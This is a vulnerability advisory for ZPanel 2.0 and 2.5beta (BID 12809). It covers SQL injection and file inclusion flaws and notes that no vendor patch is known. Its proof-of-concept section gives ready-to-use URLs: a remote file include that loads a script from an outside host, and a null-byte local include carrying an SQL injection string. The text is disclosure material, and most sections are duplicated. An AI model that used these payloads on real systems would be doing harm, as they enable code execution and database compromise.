ZPanel Multiple SQL Injection and File Include Vulnerabilities
BID:12809
Info
ZPanel Multiple SQL Injection and File Include Vulnerabilities
| Bugtraq ID: | 12809 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0792 CVE-2005-0793 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery of these vulnerabilities is credited to Mik- <[email protected]>. |
| Vulnerable: |
ZPanel ZPanel 2.5 beta9 ZPanel ZPanel 2.5 beta10 ZPanel ZPanel 2.5 beta ZPanel ZPanel 2.0 |
| Not Vulnerable: | |
Discussion
ZPanel Multiple SQL Injection and File Include Vulnerabilities
ZPanel is reportedly affected by multiple input validation vulnerabilities.
ZPanel is affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
ZPanel is also affected by remote and local file inclusion vulnerabilities. These issue are due to a failure in the application to properly sanitize user-supplied input.
The SQL injection vulnerabilities are reported to affect ZPanel versions 2 and 2.5beta; other versions may also be affected.
The remote file inclusion vulnerability is reported to only affect ZPanel version 2. The local file inclusion vulnerability is reported to affect ZPanel version 2 and 2.5beta.
ZPanel is reportedly affected by multiple input validation vulnerabilities.
ZPanel is affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
ZPanel is also affected by remote and local file inclusion vulnerabilities. These issue are due to a failure in the application to properly sanitize user-supplied input.
The SQL injection vulnerabilities are reported to affect ZPanel versions 2 and 2.5beta; other versions may also be affected.
The remote file inclusion vulnerability is reported to only affect ZPanel version 2. The local file inclusion vulnerability is reported to affect ZPanel version 2 and 2.5beta.
Exploit / POC
ZPanel Multiple SQL Injection and File Include Vulnerabilities
No exploit is required.
The following proof of concept demonstrates a remote file include for ZPanel 2.0:
http://www.example.com/zpanel/zpanel.php?page=http://[remote]/[script]
The following proof of concept demonstrates a local file include for ZPanel 2.5beta:
http://www.example.com/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
The following exploit code was provided by 1dt.w0lf:
No exploit is required.
The following proof of concept demonstrates a remote file include for ZPanel 2.0:
http://www.example.com/zpanel/zpanel.php?page=http://[remote]/[script]
The following proof of concept demonstrates a local file include for ZPanel 2.5beta:
http://www.example.com/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
The following exploit code was provided by 1dt.w0lf:
Solution / Fix
ZPanel Multiple SQL Injection and File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ZPanel Multiple SQL Injection and File Include Vulnerabilities
References:
References:
- Zpanel Homepage (ZPanel)
- Few remote bugs in zPanel (Mik-
- Re: Few remote bugs in zPanel (Zee-Way Services)